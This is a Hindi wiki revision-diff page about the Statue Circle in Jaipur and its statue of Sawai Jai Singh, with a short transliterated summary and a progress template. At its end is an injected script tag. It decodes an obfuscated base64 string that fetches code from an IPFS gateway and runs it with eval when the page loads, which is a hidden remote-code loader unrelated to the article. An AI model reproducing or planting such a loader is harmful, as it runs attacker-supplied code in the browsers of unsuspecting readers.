Difference between revisions of "स्टैच्यू सर्किल जयपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
Line 1: Line 1:
 
*जयपुर में स्थित चक्कर के मध्य सवाई [[जयसिंह]] का स्टैच्यू बहुत ही उत्कृष्ट ढंग से बना हुआ है।  
 
*जयपुर में स्थित चक्कर के मध्य सवाई [[जयसिंह]] का स्टैच्यू बहुत ही उत्कृष्ट ढंग से बना हुआ है।  
 
*इसे जयपुर के संस्थापक को श्रद्धांजलि देने के लिए नई क्षेत्रीय योजना के अंतर्गत बनाया गया है।
 
*इसे जयपुर के संस्थापक को श्रद्धांजलि देने के लिए नई क्षेत्रीय योजना के अंतर्गत बनाया गया है।
 +
{{प्रचार}}
 
{{लेख प्रगति  
 
{{लेख प्रगति  
 
|आधार=
 
|आधार=

Revision as of 13:57, 10 January 2011

  • jayapur mean sthit chakkar ke madhy savaee jayasianh ka staichyoo bahut hi utkrisht dhang se bana hua hai.
  • ise jayapur ke sansthapak ko shraddhaanjali dene ke lie nee kshetriy yojana ke aantargat banaya gaya hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>